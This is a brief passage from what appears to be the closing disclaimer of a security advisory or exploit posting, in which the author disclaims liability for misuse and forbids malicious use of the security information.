information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).